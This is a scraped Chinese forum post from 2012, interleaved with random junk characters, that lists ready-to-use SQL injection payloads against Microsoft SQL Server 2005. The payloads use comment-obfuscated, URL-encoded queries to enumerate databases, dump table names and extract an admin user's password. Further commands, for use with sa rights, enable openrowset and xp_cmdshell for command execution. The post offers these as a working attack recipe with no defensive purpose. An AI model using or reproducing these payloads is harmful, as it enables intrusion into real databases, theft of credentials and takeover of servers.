5 i+ Q. [$ |0 s3 \
! ]$ ^0 b4 \/ i, E1 T* k, [9 \0 I9 S. r- V2 Z
[Copy to clipboard]CODE:! _% b! Q2 M/ K; h2 b+ N
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--3 l+ }% v, N4 A6 Q9 p
( R+ S1 b7 E* }9 s" l
爆表语句,somedb部份是所要列的数据库,红色数字1累加
4 \7 j' S) |: n- D" n* j7 V3 b1 L
0 Z/ D( H* F. y5 ~, Y, S" V- ]3 w c+ B" |
[Copy to clipboard]CODE:
|3 `! i; G9 v9 s# w9 Y1 @/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--# z" s$ Z: J/ ~/ f0 a3 G3 r; b
* O+ D R5 f/ g4 l" l6 o6 a$ ?- F爆字段语句,爆表admin里user='icerover'的密码段
2 @7 |& V) n) @3 U$ y& ~" y! R3 ]5 O% K* \
# K) A( W2 W, z7 d# F
[Copy to clipboard]CODE:% j! B! x( ^& X( t1 @7 X
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--. A5 p% _. V1 G5 M3 A' t% x# C
) W0 P6 [6 \5 k& Y" h4 f1 \mssql2005默认没有开xp_cmdshell的,openrowset也不能用
% y- g' R# Z6 b: d) O2 W+ @2 X \如果是sa权限,可以这样来开启
' ~, Q( l4 h$ P4 j' }7 j, Q; {开启openrowset
( Z7 \3 d. F U# A$ d& K: n! g8 M8 v4 t, \
) b/ q0 Y# t0 T" u' L* d1 [0 J
[Copy to clipboard]CODE:2 w l* d Q! M. o/ M. j
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
6 a. }$ F+ N- V7 O0 ^; C/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
( S X) A9 k6 p [* J# f" }
$ E; `- e; L! I1 `" [2 C7 H! l' h开启xp_cmdshell! a; l# \3 Z/ p W# g( Y
; o, H# J ?' d0 d2 L4 z
- O+ w5 ]$ C: H+ w3 f- b
[Copy to clipboard]CODE:) o; i3 ^3 R; n) |- `7 d6 J
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
- }+ Y4 N6 @0 x) |- U& qEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
, T% g! o( i9 W0 Y3 ]
7 l/ d- h: _8 q' N$ y8 P6 @5 jok,over~~晚安" V0 u3 K2 ?$ i$ J# t7 {6 x1 j8 q
|
发表于 2012-9-13 17:19:47
收藏
支持
反对